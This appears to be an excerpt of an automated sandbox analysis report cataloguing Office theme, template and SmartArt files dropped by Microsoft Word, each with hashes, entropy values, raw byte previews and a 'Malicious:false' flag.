                                                                                      Preview:PK........<dSA4...T...P.......[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^\-o..D....n_d.jq...gwg.t........:?/..}..Vu5...rQ..7..X.Q."./g..o....f....YB......<..w?...ss..e.4Y}}...0.Y...........u3V.o..r...5....7bA..Us.z.`.r(.Y>.&DVy.........6.T...e.|..g.%<...9a.&...7...}3:B.......<...!...:..7w...y..
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):264
                                                                                      Entropy (8bit):3.4866056878458096
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:fxnxUX0XrZUloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXWloGHmD0+dAH/luWvv
                                                                                      MD5:6C489D45F3B56845E68BE07EA804C698
                                                                                      SHA1:C4C9012C0159770CB882870D4C92C307126CEC3F
                                                                                      SHA-256:3FE447260CDCDEE287B8D01CF5F9F53738BFD6AAEC9FB9787F2826F8DEF1CA45
                                                                                      SHA-512:D1355C48A09E7317773E4F1613C4613B7EA42D21F5A6692031D288D69D47B19E8F4D5A29AFD8B751B353FC7DE865EAE7CFE3F0BEC05F33DDF79526D64A29EB18
                                                                                      Malicious:false
                                                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.A.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                      Category:dropped
                                                                                      Size (bytes):6448
                                                                                      Entropy (8bit):7.897260397307811
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:tgaoRbo1sMjb0NiJ85oPtqcS+yaXWoa8XBzdJYnLYFtWT7:LR1sk+i4o1qc1yaukzd8MK
                                                                                      MD5:42A840DC06727E42D42C352703EC72AA
                                                                                      SHA1:21AAAF517AFB76BF1AF4E06134786B1716241D29
                                                                                      SHA-256:02CCE7D526F844F70093AC41731D1A1E9B040905DCBA63BA8BFFC0DBD4D3A7A7
                                                                                      SHA-512:8886BFD240D070237317352DEB3D46C6B07E392EBD57730B1DED016BD8740E75B9965F7A3FCD43796864F32AAE0BE911AB1A670E9CCC70E0774F64B1BDA93488
                                                                                      Malicious:false
                                                                                      Preview:PK.........k.>........'......diagrams/layout1.xmlz........].r.8.}.V.?p.n....g*5..JUn.....(SU......T.l.......X.d."m."..S....F..P.........-..<Y^..=..e.L....m>.pG.....M~...+\....u}o...".Yn}Y.".-r......0...'/........{........F.~.M8.d....(.....q.D.....4\.;.D,.\.)n.S....Z.cl.|<..7._.dk..7..E.......kS...d.....i.....noX...o.W#9..}.^..I0....G.......+.K.[i.O.|G..8=.;.8.8.8.8.....{..-..^.y..[.....`...0..f...Q<^~..*.l....{...pA.z.$.$R.../...E.(..Q.(V.E_ ......X]Q..Y9.......>...8......l..--.ug.......I.;..].u.b.3Lv:.d.%H..l<...V...$.M..A>...^M./.[..I....o~,.U. .$d\..?........O.;..^M..O...A.$Yx..|f.n...H.=.|!cG)dd%..(... ..Xe......2B."i...n....P.R..E?... Y.I6...7n..Xs..J..K..'..JaU..d..|.(y.a.....d......D.Dr...._.._..m..Yu..6.o.\......&.m....wy...4k?..~........f....0.. \...}iS.i..R....q-#_..g........{Z.u.V.r(....j.I...,R..f.=.n.[.'..L'd.n C.0.I.....RpaV........c.k..NR....)B^k...d.i...d0.E. ^..G.']....x.c.>'..p...y.ny.P.x6..%.J\.....De.B\.
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):274
                                                                                      Entropy (8bit):3.438490642908344
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:fxnxUXZlaWimoa2nRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxnyplagN2RGHmD0wbnKYZAH+Vwv
                                                                                      MD5:0F98498818DC28E82597356E2650773C
                                                                                      SHA1:1995660972A978D17BC483FCB5EE6D15E7058046
                                                                                      SHA-256:4587CA0B2A60728FF0A5B8E87D35BF6C6FDF396747E13436EC856612AC1C6288
                                                                                      SHA-512:768562F20CFE15001902CCE23D712C7439721ECA6E48DDDCF8BFF4E7F12A3BC60B99C274CBADD0128EEA1231DB19808BAA878E825497F3860C381914C21B46FF
                                                                                      Malicious:false
                                                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .E.l.e.m.e.n.t. .d.e.s.i.g.n. .s.e.t...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft Word 2007+
                                                                                      Category:dropped
                                                                                      Size (bytes):34415
                                                                                      Entropy (8bit):7.352974342178997
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:ev13NPo9o5NGEVIi3kvH+3SMdk7zp3tE2:ev13xoOE+R3BkR7
                                                                                      MD5:7CDFFC23FB85AD5737452762FA36AAA0
                                                                                      SHA1:CFBC97247959B3142AFD7B6858AD37B18AFB3237
                                                                                      SHA-256:68A8FBFBEE4C903E17C9421082E839144C205C559AFE61338CBDB3AF79F0D270
                                                                                      SHA-512:A0685FD251208B772436E9745DA2AA52BC26E275537688E3AB44589372D876C9ACE14B21F16EC4053C50EB4C8E11787E9B9D922E37249D2795C5B7986497033E
                                                                                      Malicious:false
                                                                                      Preview:PK.........Y5B#.W ............[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG=.HK...........&o[B....z.7.o...&.......[.oL_7cuN..&e..ccAo...YW......8...Y>.&DVy...-&.*...Y.....4.u.., !po....9W....g..F...*+1....d,'...L.M[-~.Ey. ......[
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):486596
                                                                                      Entropy (8bit):7.668294441507828
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:A+JBmUx0Zo24n8z/2NSYFl2qGBuv8p6+LwwYmN59wBttsdJrmXMlP1NwQoGgeL:fNgxz/g5z2BT6+Eu0ntMcczNQG5L
                                                                                      MD5:0E37AECABDB3FDF8AAFEDB9C6D693D2F
                                                                                      SHA1:F29254D2476DF70979F723DE38A4BF41C341AC78
                                                                                      SHA-256:7AC7629142C2508B070F09788217114A70DE14ACDB9EA30CBAB0246F45082349
                                                                                      SHA-512:DE6AFE015C1D41737D50ADD857300996F6E929FED49CB71BC59BB091F9DAB76574C56DEA0488B0869FE61E563B07EBB7330C8745BC1DF6305594AC9BDEA4A6BF
                                                                                      Malicious:false
                                                                                      Preview:PK.........V'BE,.{....#P......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):274
                                                                                      Entropy (8bit):3.535303979138867
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:Q+sxnxUX3IlVARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnynG6ymD0wbnKNAH/lMz1
                                                                                      MD5:35AFE8D8724F3E19EB08274906926A0B
                                                                                      SHA1:435B528AAF746428A01F375226C5A6A04099DF75
                                                                                      SHA-256:97B8B2E246E4DAB15E494D2FB5F8BE3E6361A76C8B406C77902CE4DFF7AC1A35
                                                                                      SHA-512:ACF4F124207974CFC46A6F4EA028A38D11B5AF40E55809E5B0F6F5DABA7F6FC994D286026FAC19A0B4E2311D5E9B16B8154F8566ED786E5EF7CDBA8128FD62AF
                                                                                      Malicious:false
                                                                                      Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.i.e.w...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):562113
                                                                                      Entropy (8bit):7.67409707491542
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:/dy5Gtyp/FZ9QqjdxDfSp424XeavSktiAVE0:/dizp1ndpqpMZnV
                                                                                      MD5:4A1657A3872F9A77EC257F41B8F56B3D
                                                                                      SHA1:4DDEA85C649A2C1408B5B08A15DEF49BAA608A0B
                                                                                      SHA-256:C17103ADE455094E17AC182AD4B4B6A8C942FD3ACB381F9A5E34E3F8B416AE60
                                                                                      SHA-512:7A2932639E06D79A5CE1D3C71091890D9E329CA60251E16AE4095E4A06C6428B4F86B7FFFA097BF3EEFA064370A4D51CA3DF8C89EAFA3B1F45384759DEC72922
                                                                                      Malicious:false
                                                                                      Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):278
                                                                                      Entropy (8bit):3.535736910133401
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:Q+sxnxUXeAlFkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyRGymD0wbnKNAH/lMz1
                                                                                      MD5:487E25E610F3FC2EEA27AB54324EA8F6
                                                                                      SHA1:11C2BB004C5E44503704E9FFEEFA7EA7C2A9305C
                                                                                      SHA-256:022EC5077279A8E447B590F7260E1DBFF764DE5F9CDFD4FDEE32C94C66D4A1A2
                                                                                      SHA-512:B8DF351E2C0EF101CF91DC02E136A3EE9C1FDB18294BECB13A29D676FBBE791A80A58A18FBDEB953BC21EC54EB7608154D401407C461ABD10ACB94CE8AD0E092
                                                                                      Malicious:false
                                                                                      Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.a.n.d.e.d...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):523048
                                                                                      Entropy (8bit):7.715248170753013
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:WfmDdN6Zfv8q5rnM6vZ02PtMZRkfW5ipbnMHxVcsOWrCMxy0sD/mcKb4rYEY:xDdQXBrMi2YtggW5ObnMH1brJpUmBU0N
                                                                                      MD5:C276F590BB846309A5E30ADC35C502AD
                                                                                      SHA1:CA6D9D6902475F0BE500B12B7204DD1864E7DD02
                                                                                      SHA-256:782996D93DEBD2AF9B91E7F529767A8CE84ACCC36CD62F24EBB5117228B98F58
                                                                                      SHA-512:B85165C769DFE037502E125A04CFACDA7F7CC36184B8D0A54C1F9773666FFCC43A1B13373093F97B380871571788D532DEEA352E8D418E12FD7AAD6ADB75A150
                                                                                      Malicious:false
                                                                                      Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):276
                                                                                      Entropy (8bit):3.5159096381406645
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:Q+sxnxUXQIa3ARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnygIaqymD0wbnKNAH/lMz1
                                                                                      MD5:71CCB69AF8DD9821F463270FB8CBB285
                                                                                      SHA1:8FED3EB733A74B2A57D72961F0E4CF8BCA42C851
                                                                                      SHA-256:8E63D7ABA97DABF9C20D2FAC6EB1665A5D3FDEAB5FA29E4750566424AE6E40B4
                                                                                      SHA-512:E62FC5BEAEC98C5FDD010FABDAA8D69237D31CA9A1C73F168B1C3ED90B6A9B95E613DEAD50EB8A5B71A7422942F13D6B5A299EB2353542811F2EF9DA7C3A15DC
                                                                                      Malicious:false
                                                                                      Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .F.r.a.m.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):570901
                                                                                      Entropy (8bit):7.674434888248144
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:D2tTXiO/3GH5SkPQVAqWnGrkFxvay910UUTWZJarUv9TA0g8:kX32H+VWgkFxSgGTmarUv9T
                                                                                      MD5:D676DE8877ACEB43EF0ED570A2B30F0E
                                                                                      SHA1:6C8922697105CEC7894966C9C5553BEB64744717
                                                                                      SHA-256:DF012D101DE808F6CD872DFBB619B16732C23CF4ABC64149B6C3CE49E9EFDA01
                                                                                      SHA-512:F40BADA680EA5CA508947290BA73901D78DE79EAA10D01EAEF975B80612D60E75662BDA542E7F71C2BBA5CA9BA46ECAFE208FD6E40C1F929BB5E407B10E89FBD
                                                                                      Malicious:false
                                                                                      Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):282
                                                                                      Entropy (8bit):3.5459495297497368
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:Q+sxnxUXvBAuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnypJymD0wbnKNAH/lMz1
                                                                                      MD5:76340C3F8A0BFCEDAB48B08C57D9B559
                                                                                      SHA1:E1A6672681AA6F6D525B1D17A15BF4F912C4A69B
                                                                                      SHA-256:78FE546321EDB34EBFA1C06F2B6ADE375F3B7C12552AB2A04892A26E121B3ECC
                                                                                      SHA-512:49099F040C099A0AED88E7F19338140A65472A0F95ED99DEB5FA87587E792A2D11081D59FD6A83B7EE68C164329806511E4F1B8D673BEC9074B4FF1C09E3435D
                                                                                      Malicious:false
                                                                                      Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.i.v.i.d.e.n.d...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):608122
                                                                                      Entropy (8bit):7.729143855239127
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:Ckl6KRKwg9jf2q/bN69OuGFlC/DUhq68xOcJzGYnTxlLqU8dmTW:8yKwgZ2qY9kA7Uhq68H3ybmq
                                                                                      MD5:8BA551EEC497947FC39D1D48EC868B54
                                                                                      SHA1:02FA15FDAF0D7E2F5D44CAE5FFAE49E8F91328DF
                                                                                      SHA-256:DB2E99B969546E431548EBD58707FC001BBD1A4BDECAD387D194CC9C6D15AC89
                                                                                      SHA-512:CC97F9B2C83FF7CAC32AB9A9D46E0ACDE13EECABECD653C88F74E4FC19806BB9498D2F49C4B5581E58E7B0CB95584787EA455E69D99899381B592BEA177D4D4B
                                                                                      Malicious:false
                                                                                      Preview:PK.........LGE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK.........LG.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):278
                                                                                      Entropy (8bit):3.516359852766808
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:Q+sxnxUXKwRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6qymD0wbnKNAH/lMz1
                                                                                      MD5:960E28B1E0AB3522A8A8558C02694ECF
                                                                                      SHA1:8387E9FD5179A8C811CCB5878BAC305E6A166F93
                                                                                      SHA-256:2707FCA8CEC54DF696F19F7BCAD5F0D824A2AC01B73815DE58F3FCF0AAB3F6A0
                                                                                      SHA-512:89EA06BA7D18B0B1EA624BBC052F73366522C231BD3B51745B92CF056B445F9D655F9715CBDCD3B2D02596DB4CD189D91E2FE581F2A2AA2F6D814CD3B004950A
                                                                                      Malicious:false
                                                                                      Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.a.r.c.e.l...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):777647
                                                                                      Entropy (8bit):7.689662652914981
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:B04bNOJMngI856k0wwOGXMaXTLaTDmfBaN2Tx9iSUk1PdSnc0lnDlcGMcEFYYYYt:xbY6ngI46Aw5dmyYYYYYYYYY7p8d
                                                                                      MD5:B30D2EF0FC261AECE90B62E9C5597379
                                                                                      SHA1:4893C5B9BE04ECBB19EE45FFCE33CA56C7894FE3
                                                                                      SHA-256:BB170D6DE4EE8466F56C93DC26E47EE8A229B9C4842EA8DD0D9CCC71BC8E2976
                                                                                      SHA-512:2E728408C20C3C23C84A1C22DB28F0943AAA960B4436F8C77570448D5BEA9B8D53D95F7562883FA4F9B282DFE2FD07251EEEFDE5481E49F99B8FEDB66AAAAB68
                                                                                      Malicious:false
                                                                                      Preview:PK.........V'B.._<....-.......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):290
                                                                                      Entropy (8bit):3.5091498509646044
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:Q+sxnxUX1MiDuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyFdMymD0wbnKNAH/lMz1
                                                                                      MD5:23D59577F4AE6C6D1527A1B8CDB9AB19
                                                                                      SHA1:A345D683E54D04CC0105C4BFFCEF8C6617A0093D
                                                                                      SHA-256:9ADD2C3912E01C2AC7FAD6737901E4EECBCCE6EC60F8E4D78585469A440E1E2C
                                                                                      SHA-512:B85027276B888548ECB8A2FC1DB1574C26FF3FCA7AF1F29CD5074EC3642F9EC62650E7D47462837607E11DCAE879B1F83DF4762CA94667AE70CBF78F8D455346
                                                                                      Malicious:false
                                                                                      Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.e.t.r.o.p.o.l.i.t.a.n...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                      File Type:Microsoft OOXML
                                                                                      Category:dropped
                                                                                      Size (bytes):558035
                                                                                      Entropy (8bit):7.696653383430889
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:DQ/oYjRRRRRRRRYcdY/5ASWYqBMp8xsGGEOzI7vQQwOyP:DQ/nRRRRRRRRxY/5JWYZ3GGbI8YA
                                                                                      MD5:3B5E44DDC6AE612E0346C58C2A5390E3
                                                                                      SHA1:23BCF3FCB61F80C91D2CFFD8221394B1CB359C87
                                                                                      SHA-256:9ED9AD4EB45E664800A4876101CBEE65C232EF478B6DE502A330D7C89C9AE8E2
                                                                                      SHA-512:2E63419F272C6E411CA81945E85E08A6E3230A2F601C4D28D6312DB5C31321F94FAFA768B16BC377AE37B154C6869CA387005693A79C5AB1AC45ED73BCCC6479
                                                                                      Malicious:false
